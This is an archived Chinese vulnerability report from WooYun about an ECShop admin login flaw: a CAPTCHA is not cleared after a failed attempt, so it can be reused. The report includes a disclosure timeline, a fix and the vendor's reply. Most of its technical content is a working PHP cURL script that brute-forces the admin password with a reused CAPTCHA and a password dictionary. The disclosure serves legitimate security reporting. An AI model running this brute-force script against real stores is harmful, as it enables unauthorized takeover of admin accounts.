乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-06-03: 细节已通知厂商并且等待厂商处理中 2013-06-03: 厂商已经确认,细节仅向厂商公开 2013-06-06: 细节向第三方安全合作伙伴开放 2013-07-28: 细节向核心白帽子及相关领域专家公开 2013-08-07: 细节向普通白帽子公开 2013-08-17: 细节向实习白帽子公开 2013-09-01: 细节向公众公开
应该流行的版本都存在此问题
若验证码不匹配,并没有销毁当前验证码所以就可以一次请求验证码图片后,只要不再刷新验证码就可以一直使用
1.获取正确的验证码2.
<?php$site='http://ecshop.com';$admin_path='/admin/privilege.php';$captcha='上一步获取的验证码';$referer=$site;function getH($url,$postdata=array()){ global $ch,$referer; $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => false, CURLOPT_TIMEOUT=> 0.11, //CURLOPT_FILE=>$f, CURLOPT_RETURNTRANSFER=>true, CURLOPT_REFERER=>$referer, //CURLOPT_POST=>1, CURLOPT_HTTPHEADER=>array('Content-Type: application/x-www-form-urlencoded; charset=iso-8859-1','Expect:'), CURLOPT_USERAGENT=>'ie' ); if(!empty($postdata)){ $options[CURLOPT_POSTFIELDS]=http_build_query($postdata); } $ret = curl_setopt_array($ch,$options); //$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//返回一个字符串,而不是直接输出到浏览器 $ret = curl_exec($ch); $info = curl_getinfo($ch); if (empty($info['http_code'])) { die("No HTTP code was returned"); } else if($info['http_code']==200) {//响应码为200 return $ret; }else{ #var_dump($info); echo '<br />'; echo ('响应码:'.$info['http_code']);// echo '<br />'; echo $postdata['username'].' ---'.$postdata['password']; echo '<br />'; } }$url=$site.$admin_path;$data=array( 'username'=>'admin', 'password'=>'123456ad', 'captcha'=>$captcha, 'act'=>'signin' );//词典$passwds=array('1','2','3','123456a','123456','123456ds');foreach($passwds as $p){ $data['password']=$p; $res= strip_tags(getH($url,$data)); if(stripos($res,'您输入的帐号信息不正确')){ echo 'no'; } echo '<br>------------------------<br>';}
验证识别后销毁session中的验证码
危害等级:中
漏洞Rank:6
确认时间:2013-06-03 13:13
非常感谢您为shopex信息安全做的贡献我们将尽快修复非常感谢
暂无